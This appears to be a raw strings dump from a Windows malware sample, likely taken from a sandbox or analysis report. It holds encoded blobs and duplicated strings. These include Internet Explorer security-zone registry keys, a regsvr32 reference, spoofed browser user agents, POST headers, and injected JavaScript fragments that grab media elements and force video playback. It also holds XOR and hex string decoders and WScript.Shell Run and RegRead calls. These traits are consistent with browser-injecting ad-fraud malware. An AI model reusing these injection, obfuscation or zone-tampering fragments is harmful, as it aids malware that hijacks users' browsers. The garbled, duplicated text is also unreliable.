2QmAhnpu8fcGUPYZyHeQyChZMoQ/D5d5AZr0RMKkXSBpgoUeQA68kGNIt5xXrV6o8QS8z0K4M8/acNmHet3lgIpPfrM3KHMJVLHZV5gnlYIpq 3Std7mjXltyWOmlU01mcpaju/he1E2Lz04lkhk4ZVxPeg8DJMsTwXfEuMRo4pdRHI0NadevziCU4xjImH/yoUssKerbXMn1wMORwlp/k0 VVrGyYSi4vdLFS3UlXgbi1095arJ1fxvwbnnkviDbAcwVpdWbk 2DklaltjFVzYEU5 2iYATMPlxyE8aSpdfm/SECMCEd244OvjLbc39VZhixL6gBxt4 CnPjHQDoKsoiFZfDyvSE1iwVxoacXcReLFkhoWojYggw3ep Hhk1fFrZWukcbDRTysyv4A RV0UvVSiLsWRR5x1Q6TCMH9JLuCmg165bGfo5b0K0LNDkwOZYhhy1i2qIVkvrmwb9r1Jga8ezq 3dis40etEfUBKCKEphbjj7OhN//CNc0l 73xqZrpYNfV6sAlZvdg95xbgvnsjAMqrsn9mGidK 0QlV2ndhTdo7G3y93rYEcmeR8I18yzTGloiKWTC5 t5PptwGlywmqQTrAc85b6yvfh7pz/ xRwLfLGZtQpvpgeognCnQVctWgg8tJ24W8sytOHljZ5M5LSNO133on8yS40zNvYIu4sDcbQ WmDEL0ZGF EQiG6FyxUotVY LsAh/gH9MWC6mU0Wd3ZgehfYWzSTTfjjqKQLyo9DnEsw8NGN5mDI2vvNqxmB13E2I /4JpjW8UZbcHj6CTf2yBWAllS3cIGKS7RhsQ6KtsLTZFqPzHiQQJ08tG0Wc5UIH r9CgaTkAZUoPZ1GeSNBBHinj3owfCFkhHSIOnL7xFDJRYhlC6Ozw/do2V8/tFGMmApiBcKA3fabVwTpBWKL/zH6QpTSqYfJ6FeFwLoIhMLhSaQHcoGUJDhjwiELkqPL8DzEKSDaJpkDdeUnnYmixASN BvhpyyD XtW6udDeLIdWGSXrXbK43XFT58KWGP/Ae213bAGSGezZWFuw9EPRblSqqaZtk4moTw/etWmK58MKzQmaoc2XI0g1IEg4/l4q0 uYFooQFoVZ8a6/G2gM4uBpKGjj1CF1RWNxoId/FFEg8s2Ppg62D2Mcpe xI3n9eh3sXIYoLTlHEJB8KQi6/LCbDhUO0N5SsgwaLxWhy1lo1f38VhLX5x8kDXMJDETRpwPGoUojilI7bYbFfYR6Ylrl8pdBf9zHbho4zif23dQACP99TXtSUwQXD8xp3jsbDDdeL1hK7ioOndBDpLClwpvCSHwh52OPzdx9N3 Wk/XqDDgRxhMesca 0S2DM9 kZubOrLoiAgX9o1CcsMn9eIY zLWsTazbdNPvEUNj6SKJIjRVnKZltFsKUkPOdgUHk/j05chZ24pbF20a3pNdXvNoEAShCaMyfJV2v/0WE02YcJw8rVpriebDi3dPjCn0S baITraQLe5yAXpB5LXLzAvvGwvDSBsVpp8u8H2UVC97KSX3N42CxO61VFmPxWHApPqLSGQw30DHSV/nfVEAfKR3YMOFRWvwmfbIFKl4l0siRF3LNOPowDEUNvFypVzaPOkYxeIZVT3x8h6ZTC2ldtbx984jHuMCuY1lY5xaUMWtuvBP4HYonozcjueFSS9dceXJ2LDTdC8fppm/q8yhQOT/i2m096Fv5Jk3swvPtGyiWW8LEkjwIhaI7aLSlfC00KSDl9UpCRdrYFVg0mtJIxoJiw76B66wNirFwVWTsAqviTPweIumnhKdRVRyPVGbmlKfaDqwz8xS9yM2C5dxazuQBmUwOWfDICcyXLyDpLFAnEOvC1TJ99bFBIB2W29wz11XU3EHkrQ8tTocRVE8Ewz QHCJLxF e3n85lsPxHBYmweu6b06GOipn0B9AbHaRKnZNB3orJnjT5bgnGJfnbWJ0MkH4y/H7vhLw 3z30b6Rx8RAeMhwmpsmZOHWPKZKKGJ2401ZIcESIkw XRajBY3o5lhHlCoe8eDQwP MhPHhC15i/k8A9jW6PId23MPyzLMRABYvVW7ObyisEWeIcvNZuhNnPZqAwbfVNujSyyzCY5lHnAQhBjIQWdbd GHZYC/a sXVkmkcMoEJC9/wCMLn0bYSLmNyyXjbI1gt njxbQB5kPyflr/IWNkdyo37FBg9Bj9aTTkLcnZMA/lKUQqiLksyx1md6EFapDKrpfI1OTVeqAli17WDBVF1P4kTsTdFs1oSKb2yssAlFuW4ADQ80ccCUPD4PpCBsteHKT5O4qtiS8wVanr3bzCsQzIvj1JQk/Vs7ta4yRPjXYlC/QSviTL9oEKh3vNQZv/9SEZocqBAMSQni0RdlMtc/1UDWBH8 rApgq69I3LLe75NC/R/t3B8WffKF0Xwg qqhNUNue6vzmD1/r3a4RtGgDGifuiQ FmF4NACyciA9I 90 KjaEHSbZ02T6cqGIjvAERyepxBIegZPAMdRN0hM0JZAm6t42jzUyn4cJAlRDY7PbeP7A3etyY694guefwC6cRF3djZhAUKau2MqoSIlM9ZfHcMlIy0ju1lTn6TuiHVqFMEoZl9FFO0sPW5MmRn7aUgQVq644zEQ4ZinDTpvROeVeCTgPOOZjo6DiMtwwwTs7EWT7AVn3 f7uSDPLw6hTx9baJJ88ZvSTMeloTZz8uhjig4Fr8H7ZhjhrdtToS/Uvvan980QyoLlwvutx7zkLAwzU8ZFyJeYNVCreppmX1ERsc3nXs3 q4P8l1aUVKcSdqQWbz/PC4N9nD608OoOXDlRzxG6 VJZ7/eqS9MX5JAASOMrZ1RLZ iFfKeeue5hoJVXb2vFiUlWzDQ5/FSXR 8KYdQRg2xuRHnhOWtXG0oxmXmcIOinppThzK NGKHZEG5ZbiqrB6AhMvqv8GpaLs5ZFH/9hzd8HUQLgOUKDRoVVqgbXhCApa/GrcLXat5BE rkXKNa dsIJbpjppZ1xZ3nZ1rC7MO1qfm9//ymApylmBnXXv5IfrFR/teh HbaCUYl17xjZoOoeMUqOvS73bzixbywl97l ecwB PIrq0ftaliY2PL39/4bINwRfjvgdTjOLX2naBQIA8WcangImCoYH4wUXjmVRPSJh4foNftFtUrxT MkaC4Oeu1NqENQNPxmUgnYo8F9YDcnBIz4pZatOStPT2vdDfVL4Fag9RkB F7B5aprbDoTEBTbX9mAamCjOZ/0wurCeaP JAsNPrp3lUCbtWuKKp9w8X7w0i7nEmad6RLEh2DayCf0eJKV1R/5agf4Gvc5aiC2xRp4WQhnjoCs4vrNZbpCyifRoA4rjxxD S5FuxwrGYlcy7zkbcOaQsWiRSZBo9spuic/mjkhlbIp8GzaPU0uIXjfL6d8Ulq9KPhHlb9r/oHwgCBuTOup4Q2uoqM9jvYw1i7MoIv3RRf8YzVSCRw QlJXcaHHnqdDnhPaBNBh4mkzQ fRblsl4LdoJc1YFTF56Dm ZvOEZH1j7hGNkRs2akeGX6vHvSn3E0c5s wFrbDjD gvl6v/e414Xvog3K7sY1yGxGrIOtt5POiG4o/FtEFmkZCtgfEepTnnLdbzZoONhzywCN75 T6usIuaFeiinI/m4z9 7nIT oDlaEtGwwzDAadqvZAmzRzNTCcU3Ykt4xIh7C1y25K7iYFzoEsWHxQKdPGT3Zgmm28qIC 7/dAwvl asVNW7VWPbdMBQABK DB4d8md3yKri/f1KPH2yY3Jry3zkl/EqJPUeSO3fDSJUDWEwe 4k0QveWcNr9KchSnnhL4TNzJxnHnRsjunajxd8qc4HuWHDMjdzanWIpyMEFajntapZgNscR8ZHk699SW3GuJvykAjM/ZDyOCXmFGgWvW7/xLelvAG7pp9lThSwDaiD6EQT4xByqM7rctSPvOH1h6Kzc78CppXNWdn1ev4d49Vs/NJOf0I9mTOe XKF/sZM4daZVTt/CTivlhbMQiSKnI 2LchxwtU071RcSAKBC0N4aYagIEENLxEtbywgBBTsT hfUgfyPFzQLhgVT87NLcOWApc/r7IyiPZlcKRW9vWk y44xujeKVkmSMj1ck6X3G3cGD4qmm8EFWnc9CKOi9nSDz4Kbe34YCeJ WsMcEEBFeg93eNLg urf251uE2J4prpE5HL17sIA629h8hJ3HpsJ85e7oH5tvxRAprcKP76/lGv3KitfWcPpjDXHRzL86xpn543GPrilrlCTqqsgaB3FZqXiBMxjruFf3J80feF4i0pR 8ThAXGFADwY5VtNlc6QDxP27HwViApoLpM63D47xX1CtZcwM2L4tLBEjlgzGOMTVBmhgt9QO2visWAb2VN0Wm vM8VHLWeaUcVSrwqx9C4l4QylCmgUKQC/lMjiu bAKJWC0dyeETqhOnpdWzvjS5FS15 4KfpV4ZLhuzbaZvDaaJVyXIH8QE0j3mU/xrd98c8/SSLgAGeIdIoQfCA7FL0n30qFhhMv1a9Wv1xByL3h4j7dx2hTOhhSN1MFvbyou7nl9C4K77Ia cWuKk cOmJaKylkfX0JQEknlPC0q9c0jLzL xGRE2c0CSDKYe5GNC9YYRNHGN6PurACw2eQvSdUpsgaHSHhB8NydtTWZiIw8 bnITKflQKh9WzPAD7GRoa9joLy nKlyz1FUb/RVfQydCKMp5IGBYHAr8lNe6Hs7QkuWBVCZGDqV74zeVeAeZxkSaO6ABPhHXrhRttyYJKaa2e16xapeB/shfFVG/S8geyqXdQrVlR/m/1YtijOiIi0oBFln5TMLnemc6isRdJBZcp3PbAtVbXhfykb2/ZbxjFz2/i/q09UxOlqIL4nlNg8ppu40jRax c5QB3sfHJoMSgZa5sGK7iYGiWpXdBTM0TK0yc3F8FxuO1yIDnxVBeBj02N3cHBPVOdDS7FrLGDh5A3G4C4sGIbx3DmUe7snKiuvBx92eSI1bXQXVC8lMGuv9/dMI0W4aTyLdWAmWHT2nhQbS9/BcSXwcxXr8dMGjTXwQuTFPjyye3y/MhIz5R25k41zAkKayv/PVlYFXxOoovMCoUnfyOme20vlz3gPr0/EItd09L8FpoyEcSj1Qj3m eIs5d2jum1KPOYceU2941phMmFrAkJLZ2M7lBjsGzUIz36ulPVqiU7vDekBF3DardgJTGlVpgjsKTICwrR7b9VniFnBKfQX5rMT9vpLZXon7RNZJtjqe2qYMR2RdDZq2ra0lDffFxNmmGuTgQI6qgNLYERXc4l93/Y/RTplukg/u/kYWAf3wZIITfMXtHWqb8PzT5UmJynu4D2eQyoVRDFlkil7gG1DcSZGYdFsqKdPH4tSMOTJwYtkePYtwHGYKYL71CLlFeAPvJzOWzrOxRLfVe1lpkVpMPNcwY5jpM/h/wQMjoP3nVA7EEe2Rc/F7iLg7FeQFL15NYBjqs chgAxTO BDi31uCMPydHfs 72ggtPK1alJWlWV6/2amM0La0lj3eLOjwlOPoM/JCcuRPBIOOGILxHzfzQAcKlJ8N0 7U1eT50jitTLcIhqonwYgawzChExnjbljE3PlCn/yh7oXKyEPqDOUqpPlOdcXdygHqhPkryZ Oyq08RTe/buhaS s3aG40izuACX4lGAo4Vwtc99zVRkOKQztZ9hxSPmdvoogKkh6O0PoUXGhcWQGVcYo2yHU6w9CfydV7E8Cm2ynUbEEiOaPXois6s CeNRPC1VWusBNZ9lA3vY/7zB yGfYy5RZjXNZOqq8NHzdvZx1gqF2zNdPbN67Ze61iqdMupKURgLQbXCLTZ8P8ir3w9z0w9dxydkSrTwLI9wmqgw5fpFnevAV39oJsAyf5GJcIIcPKeG8rU6DkVDXZWI6BBimF2HBnnbYsNN/RXwd5fLLMLyUe5mkouZS4 XE2BmjIbWVno1TVoRSZqXZFAI108Sqy94zD2m8auf/n7edAA0bErhMR m6bSIGVD7YDgp3vIkGe/QFTiY2rzjC7ZhQ2yIITwA8fSKD7VQC/ZAzgixqrl4jL2muO9s wUYDGkxgUviFQlDNEPHk8 RlgMPew/L1eYhiJV NuSRdmLE2/rQfQ zBzdNg7RCmPjx132S40XtOwDfy1eLmV47Y1v/r/gdFKETzVNd5IXo21URoSVXiQZAnpih/4wqMqFfAHaiyIJ/pd9Rci5AbEaFDngNoGsOZ Xuyv5HPOZM1mNoXyoPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD-
2QmAhnpu8fcGUPYZyHeQyChZMoQ/D5d5AZr0RMKkXSBpgoUeQA68kGNIt5xXrV6o8QS8z0K4M8/acNmHet3lgIpPfrM3KHMJVLHZV5gnlYIpq 3Std7mjXltyWOmlU01mcpaju/he1E2Lz04lkhk4ZVxPeg8DJMsTwXfEuMRo4pdRHI0NadevziCU4xjImH/yoUssKerbXMn1wMORwlp/k0 VVrGyYSi4vdLFS3UlXgbi1095arJ1fxvwbnnkviDbAcwVpdWbk 2DklaltjFVzYEU5 2iYATMPlxyE8aSpdfm/SECMCEd244OvjLbc39VZhixL6gBxt4 CnPjHQDoKsoiFZfDyvSE1iwVxoacXcReLFkhoWojYggw3ep Hhk1fFrZWukcbDRTysyv4A RV0UvVSiLsWRR5x1Q6TCMH9JLuCmg165bGfo5b0K0LNDkwOZYhhy1i2qIVkvrmwb9r1Jga8ezq 3dis40etEfUBKCKEphbjj7OhN//CNc0l 73xqZrpYNfV6sAlZvdg95xbgvnsjAMqrsn9mGidK 0QlV2ndhTdo7G3y93rYEcmeR8I18yzTGloiKWTC5 t5PptwGlywmqQTrAc85b6yvfh7pz/ xRwLfLGZtQpvpgeognCnQVctWgg8tJ24W8sytOHljZ5M5LSNO133on8yS40zNvYIu4sDcbQ WmDEL0ZGF EQiG6FyxUotVY LsAh/gH9MWC6mU0Wd3ZgehfYWzSTTfjjqKQLyo9DnEsw8NGN5mDI2vvNqxmB13E2I /4JpjW8UZbcHj6CTf2yBWAllS3cIGKS7RhsQ6KtsLTZFqPzHiQQJ08tG0Wc5UIH r9CgaTkAZUoPZ1GeSNBBHinj3owfCFkhHSIOnL7xFDJRYhlC6Ozw/do2V8/tFGMmApiBcKA3fabVwTpBWKL/zH6QpTSqYfJ6FeFwLoIhMLhSaQHcoGUJDhjwiELkqPL8DzEKSDaJpkDdeUnnYmixASN BvhpyyD XtW6udDeLIdWGSXrXbK43XFT58KWGP/Ae213bAGSGezZWFuw9EPRblSqqaZtk4moTw/etWmK58MKzQmaoc2XI0g1IEg4/l4q0 uYFooQFoVZ8a6/G2gM4uBpKGjj1CF1RWNxoId/FFEg8s2Ppg62D2Mcpe xI3n9eh3sXIYoLTlHEJB8KQi6/LCbDhUO0N5SsgwaLxWhy1lo1f38VhLX5x8kDXMJDETRpwPGoUojilI7bYbFfYR6Ylrl8pdBf9zHbho4zif23dQACP99TXtSUwQXD8xp3jsbDDdeL1hK7ioOndBDpLClwpvCSHwh52OPzdx9N3 Wk/XqDDgRxhMesca 0S2DM9 kZubOrLoiAgX9o1CcsMn9eIY zLWsTazbdNPvEUNj6SKJIjRVnKZltFsKUkPOdgUHk/j05chZ24pbF20a3pNdXvNoEAShCaMyfJV2v/0WE02YcJw8rVpriebDi3dPjCn0S baITraQLe5yAXpB5LXLzAvvGwvDSBsVpp8u8H2UVC97KSX3N42CxO61VFmPxWHApPqLSGQw30DHSV/nfVEAfKR3YMOFRWvwmfbIFKl4l0siRF3LNOPowDEUNvFypVzaPOkYxeIZVT3x8h6ZTC2ldtbx984jHuMCuY1lY5xaUMWtuvBP4HYonozcjueFSS9dceXJ2LDTdC8fppm/q8yhQOT/i2m096Fv5Jk3swvPtGyiWW8LEkjwIhaI7aLSlfC00KSDl9UpCRdrYFVg0mtJIxoJiw76B66wNirFwVWTsAqviTPweIumnhKdRVRyPVGbmlKfaDqwz8xS9yM2C5dxazuQBmUwOWfDICcyXLyDpLFAnEOvC1TJ99bFBIB2W29wz11XU3EHkrQ8tTocRVE8Ewz QHCJLxF e3n85lsPxHBYmweu6b06GOipn0B9AbHaRKnZNB3orJnjT5bgnGJfnbWJ0MkH4y/H7vhLw 3z30b6Rx8RAeMhwmpsmZOHWPKZKKGJ2401ZIcESIkw XRajBY3o5lhHlCoe8eDQwP MhPHhC15i/k8A9jW6PId23MPyzLMRABYvVW7ObyisEWeIcvNZuhNnPZqAwbfVNujSyyzCY5lHnAQhBjIQWdbd GHZYC/a sXVkmkcMoEJC9/wCMLn0bYSLmNyyXjbI1gt njxbQB5kPyflr/IWNkdyo37FBg9Bj9aTTkLcnZMA/lKUQqiLksyx1md6EFapDKrpfI1OTVeqAli17WDBVF1P4kTsTdFs1oSKb2yssAlFuW4ADQ80ccCUPD4PpCBsteHKT5O4qtiS8wVanr3bzCsQzIvj1JQk/Vs7ta4yRPjXYlC/QSviTL9oEKh3vNQZv/9SEZocqBAMSQni0RdlMtc/1UDWBH8 rApgq69I3LLe75NC/R/t3B8WffKF0Xwg qqhNUNue6vzmD1/r3a4RtGgDGifuiQ FmF4NACyciA9I 90 KjaEHSbZ02T6cqGIjvAERyepxBIegZPAMdRN0hM0JZAm6t42jzUyn4cJAlRDY7PbeP7A3etyY694guefwC6cRF3djZhAUKau2MqoSIlM9ZfHcMlIy0ju1lTn6TuiHVqFMEoZl9FFO0sPW5MmRn7aUgQVq644zEQ4ZinDTpvROeVeCTgPOOZjo6DiMtwwwTs7EWT7AVn3 f7uSDPLw6hTx9baJJ88ZvSTMeloTZz8uhjig4Fr8H7ZhjhrdtToS/Uvvan980QyoLlwvutx7zkLAwzU8ZFyJeYNVCreppmX1ERsc3nXs3 q4P8l1aUVKcSdqQWbz/PC4N9nD608OoOXDlRzxG6 VJZ7/eqS9MX5JAASOMrZ1RLZ iFfKeeue5hoJVXb2vFiUlWzDQ5/FSXR 8KYdQRg2xuRHnhOWtXG0oxmXmcIOinppThzK NGKHZEG5ZbiqrB6AhMvqv8GpaLs5ZFH/9hzd8HUQLgOUKDRoVVqgbXhCApa/GrcLXat5BE rkXKNa dsIJbpjppZ1xZ3nZ1rC7MO1qfm9//ymApylmBnXXv5IfrFR/teh HbaCUYl17xjZoOoeMUqOvS73bzixbywl97l ecwB PIrq0ftaliY2PL39/4bINwRfjvgdTjOLX2naBQIA8WcangImCoYH4wUXjmVRPSJh4foNftFtUrxT MkaC4Oeu1NqENQNPxmUgnYo8F9YDcnBIz4pZatOStPT2vdDfVL4Fag9RkB F7B5aprbDoTEBTbX9mAamCjOZ/0wurCeaP JAsNPrp3lUCbtWuKKp9w8X7w0i7nEmad6RLEh2DayCf0eJKV1R/5agf4Gvc5aiC2xRp4WQhnjoCs4vrNZbpCyifRoA4rjxxD S5FuxwrGYlcy7zkbcOaQsWiRSZBo9spuic/mjkhlbIp8GzaPU0uIXjfL6d8Ulq9KPhHlb9r/oHwgCBuTOup4Q2uoqM9jvYw1i7MoIv3RRf8YzVSCRw QlJXcaHHnqdDnhPaBNBh4mkzQ fRblsl4LdoJc1YFTF56Dm ZvOEZH1j7hGNkRs2akeGX6vHvSn3E0c5s wFrbDjD gvl6v/e414Xvog3K7sY1yGxGrIOtt5POiG4o/FtEFmkZCtgfEepTnnLdbzZoONhzywCN75 T6usIuaFeiinI/m4z9 7nIT oDlaEtGwwzDAadqvZAmzRzNTCcU3Ykt4xIh7C1y25K7iYFzoEsWHxQKdPGT3Zgmm28qIC 7/dAwvl asVNW7VWPbdMBQABK DB4d8md3yKri/f1KPH2yY3Jry3zkl/EqJPUeSO3fDSJUDWEwe 4k0QveWcNr9KchSnnhL4TNzJxnHnRsjunajxd8qc4HuWHDMjdzanWIpyMEFajntapZgNscR8ZHk699SW3GuJvykAjM/ZDyOCXmFGgWvW7/xLelvAG7pp9lThSwDaiD6EQT4xByqM7rctSPvOH1h6Kzc78CppXNWdn1ev4d49Vs/NJOf0I9mTOe XKF/sZM4daZVTt/CTivlhbMQiSKnI 2LchxwtU071RcSAKBC0N4aYagIEENLxEtbywgBBTsT hfUgfyPFzQLhgVT87NLcOWApc/r7IyiPZlcKRW9vWk y44xujeKVkmSMj1ck6X3G3cGD4qmm8EFWnc9CKOi9nSDz4Kbe34YCeJ WsMcEEBFeg93eNLg urf251uE2J4prpE5HL17sIA629h8hJ3HpsJ85e7oH5tvxRAprcKP76/lGv3KitfWcPpjDXHRzL86xpn543GPrilrlCTqqsgaB3FZqXiBMxjruFf3J80feF4i0pR 8ThAXGFADwY5VtNlc6QDxP27HwViApoLpM63D47xX1CtZcwM2L4tLBEjlgzGOMTVBmhgt9QO2visWAb2VN0Wm vM8VHLWeaUcVSrwqx9C4l4QylCmgUKQC/lMjiu bAKJWC0dyeETqhOnpdWzvjS5FS15 4KfpV4ZLhuzbaZvDaaJVyXIH8QE0j3mU/xrd98c8/SSLgAGeIdIoQfCA7FL0n30qFhhMv1a9Wv1xByL3h4j7dx2hTOhhSN1MFvbyou7nl9C4K77Ia cWuKk cOmJaKylkfX0JQEknlPC0q9c0jLzL xGRE2c0CSDKYe5GNC9YYRNHGN6PurACw2eQvSdUpsgaHSHhB8NydtTWZiIw8 bnITKflQKh9WzPAD7GRoa9joLy nKlyz1FUb/RVfQydCKMp5IGBYHAr8lNe6Hs7QkuWBVCZGDqV74zeVeAeZxkSaO6ABPhHXrhRttyYJKaa2e16xapeB/shfFVG/S8geyqXdQrVlR/m/1YtijOiIi0oBFln5TMLnemc6isRdJBZcp3PbAtVbXhfykb2/ZbxjFz2/i/q09UxOlqIL4nlNg8ppu40jRax c5QB3sfHJoMSgZa5sGK7iYGiWpXdBTM0TK0yc3F8FxuO1yIDnxVBeBj02N3cHBPVOdDS7FrLGDh5A3G4C4sGIbx3DmUe7snKiuvBx92eSI1bXQXVC8lMGuv9/dMI0W4aTyLdWAmWHT2nhQbS9/BcSXwcxXr8dMGjTXwQuTFPjyye3y/MhIz5R25k41zAkKayv/PVlYFXxOoovMCoUnfyOme20vlz3gPr0/EItd09L8FpoyEcSj1Qj3m eIs5d2jum1KPOYceU2941phMmFrAkJLZ2M7lBjsGzUIz36ulPVqiU7vDekBF3DardgJTGlVpgjsKTICwrR7b9VniFnBKfQX5rMT9vpLZXon7RNZJtjqe2qYMR2RdDZq2ra0lDffFxNmmGuTgQI6qgNLYERXc4l93/Y/RTplukg/u/kYWAf3wZIITfMXtHWqb8PzT5UmJynu4D2eQyoVRDFlkil7gG1DcSZGYdFsqKdPH4tSMOTJwYtkePYtwHGYKYL71CLlFeAPvJzOWzrOxRLfVe1lpkVpMPNcwY5jpM/h/wQMjoP3nVA7EEe2Rc/F7iLg7FeQFL15NYBjqs chgAxTO BDi31uCMPydHfs 72ggtPK1alJWlWV6/2amM0La0lj3eLOjwlOPoM/JCcuRPBIOOGILxHzfzQAcKlJ8N0 7U1eT50jitTLcIhqonwYgawzChExnjbljE3PlCn/yh7oXKyEPqDOUqpPlOdcXdygHqhPkryZ Oyq08RTe/buhaS s3aG40izuACX4lGAo4Vwtc99zVRkOKQztZ9hxSPmdvoogKkh6O0PoUXGhcWQGVcYo2yHU6w9CfydV7E8Cm2ynUbEEiOaPXois6s CeNRPC1VWusBNZ9lA3vY/7zB yGfYy5RZjXNZOqq8NHzdvZx1gqF2zNdPbN67Ze61iqdMupKURgLQbXCLTZ8P8ir3w9z0w9dxydkSrTwLI9wmqgw5fpFnevAV39oJsAyf5GJcIIcPKeG8rU6DkVDXZWI6BBimF2HBnnbYsNN/RXwd5fLLMLyUe5mkouZS4 XE2BmjIbWVno1TVoRSZqXZFAI108Sqy94zD2m8auf/n7edAA0bErhMR m6bSIGVD7YDgp3vIkGe/QFTiY2rzjC7ZhQ2yIITwA8fSKD7VQC/ZAzgixqrl4jL2muO9s wUYDGkxgUviFQlDNEPHk8 RlgMPew/L1eYhiJV NuSRdmLE2/rQfQ zBzdNg7RCmPjx132S40XtOwDfy1eLmV47Y1v/r/gdFKETzVNd5IXo21URoSVXiQZAnpih/4wqMqFfAHaiyIJ/pd9Rci5AbEaFDngNoGsOZ Xuyv5HPOZM1mNoXyoPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD-
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
- cmdline args path>path inj_ffile>inj_ffile
- cmdline args path>path inj_ffile>inj_ffile
regsvr32.exe_2024:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
USER32.DLL
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
12_12_12
12_12_12
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
